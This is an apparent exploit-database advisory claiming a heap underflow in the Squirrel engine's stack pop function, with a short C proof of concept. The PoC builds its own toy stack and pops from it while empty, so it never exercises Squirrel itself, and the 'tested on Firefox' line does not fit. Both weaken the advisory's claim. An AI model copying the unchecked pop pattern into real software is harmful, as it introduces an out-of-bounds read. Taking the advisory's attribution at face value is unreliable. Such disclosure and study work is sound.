=============================================================================================================================================
| # Title     : Squirrel Heap Underflow in Stack Pop Function Leading to Out-of-Bounds Read                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
| # Vendor    : http://squirrel-lang.org/                                                                                                   |
=============================================================================================================================================

[+] Summary    :  A vulnerability exists in the Squirrel engine’s stack implementation due to missing bounds checking in the PopTarget function. 
                  When attempting to pop from an empty stack, the function reads from data[size - 1] (index -1), causing a heap buffer underflow.

[+] This allows:

Information disclosure (heap metadata or adjacent memory content)

Application crashes (segmentation faults)

Potential escalation if the leaked memory affects control flow

[+] Vulnerability Type: Out-of-Bounds Read / Heap Underflow

[+] Affected Component: Stack management in Squirrel Engine

[+] Save as: poc.c

[+] Translation with AddressSanitizer protection (recommended) : gcc -fsanitize=address -g poc.c -o poc

[+] Run : ./poc

[+] An ASAN report similar to:

heap-buffer-overflow

READ of size 8

[+] POC   : 

#include <stdio.h>
#include <stdlib.h>

typedef struct {
    long long *data;
    int size;
    int capacity;
} TargetStack;

long long PopTarget(TargetStack *stack) {

    long long target = stack->data[stack->size - 1]; 
    stack->size--;
    return target;
}

int main() {

    TargetStack stack;
    stack.capacity = 4;
    stack.size = 0; 
    stack.data = (long long *)malloc(stack.capacity * sizeof(long long));

    if (stack.data == NULL) return 1;

    printf("Starting PoC...\n");
    printf("Stack size: %d\n", stack.size);
    printf("Attempting to PopTarget from empty stack...\n");
    
    long long leaked_data = PopTarget(&stack);
    printf("Leaked data from index [-1]: %lld\n", leaked_data);

    free(stack.data);
    return 0;
}

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================